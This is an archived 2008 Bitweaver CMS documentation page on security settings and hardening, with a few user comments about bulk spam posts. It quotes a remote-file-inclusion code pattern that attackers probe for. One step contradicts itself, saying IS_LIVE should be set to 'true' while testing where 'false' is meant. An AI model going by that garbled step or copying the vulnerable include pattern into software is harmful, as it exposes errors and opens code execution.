login | register
Sat 11 of Oct, 2008 (07:43 UTC)

bitweaver - Web Application Framework and CMS

Web Application Framework and CMS

Refresh cache Discuss [3] HistoryPrint

Security

Bitweaver security settings

Created by: laetzer, Last modification: Tue 15 of Jul, 2008 (16:13 UTC)

Page Contents

Bitweaver 2

Security settings

After you installed bitweaver, check the following settings:
  • In /kernel/config_inc.php the parameter IS_LIVE should be "true" (it's "true" by default). From then on, error messages are not exposed to visitors anymore. To see the errors yourself, either monitor your error logs directly from the server, or set IS_LIVE to "true" only while testing and developing (while having other protection in place).
  • Rename your /install/ directory. Rename it back only to install new packages.
  • In Admin > Users > Permissions, make sure that Anonymous is not allowed to attach files to content (not allowed by default)
  • If users are allowed to input HTML, enable HTMLPurifier, which strips malicious code.
  • If Anonymous can submit content, enable CAPTCHA (depends on your server's setup).

Security issues

wiki_url_import

The "suck_url Information Disclosure" security issue has been fixed in version 2.1. Before, it was exploitable when the admin turned on the feature wiki_url_import (off by default).

Hacking attempts

The script kiddie plague du jour is the idea to exploit code that does: include($varWithSomeUrlFromGetString); which would execute remotely written PHP. If such an attack is attemped, a bitweaver install might mail an error message to you, the admin, alerting something like "unknown column" or "unknown sort order" (note that normal users browsing your pages will never see any error message unless you set IS_LIVE to false in /kernel/config_inc.php). The error mail informs you that the attemptet hack failed (that it didn't do anything).

3rd party applications

PHP security settings

  • For security reasons, your server might run PHP with features like open_basedir or safe_mode switched ON. See Install under safe mode.

Bitweaver 1.3

Bitweaver versions 1.3 and before were released in 2004/2005 (see Roadmap). These versions are not supported anymore, i.e., the code hasn't been updated since the release. There are a couple of serious security issues. Some stem from 3rd party code, like left-over code from older versions or the infamous Xmlrpc bug (if enabled). Many of the improvements introduced with bitweaver 2 addressed these issues specifically. In other words, don't install version 1.3 anymore. If you're running version 1.3 and are concerned about security, please upgrade bitweaver.

Comments

Reply to this comment

Porn Posts

by sourceview, Tuesday 05 of February, 2008 (16:20:55 UTC)
A few days of neglect and I find 650 porn posts awaiting approval. Is there some way to get rid of these in bulk, without going in and erasing each one individually? And how do I arrange it so that only verified emails can post.
Reply to this comment

Re: Porn Posts

by Kozuch, Tuesday 05 of February, 2008 (18:12:39 UTC)
So far I know you can only verify emails at registration... that means you could filter it there.
Reply to this comment

Re: Porn Posts

by Stephen, Sunday 17 of February, 2008 (10:14:14 UTC)
I disabled allowing anonymous users to post articles by changing the group permissions accordingly. Just an idea if you haven't do so already.--Just remember to enable posting articles to your registered users, or noone will be able to submit articles.

Related Items

Documentation » Optimisation

Tips and Tricks on how to optimise your system to get the best performance out of bitweaver and your server

Advanced Apache Configuration for High Traffic Sites  •  bitweaverPerformance  •  Security  •  Speed optimisation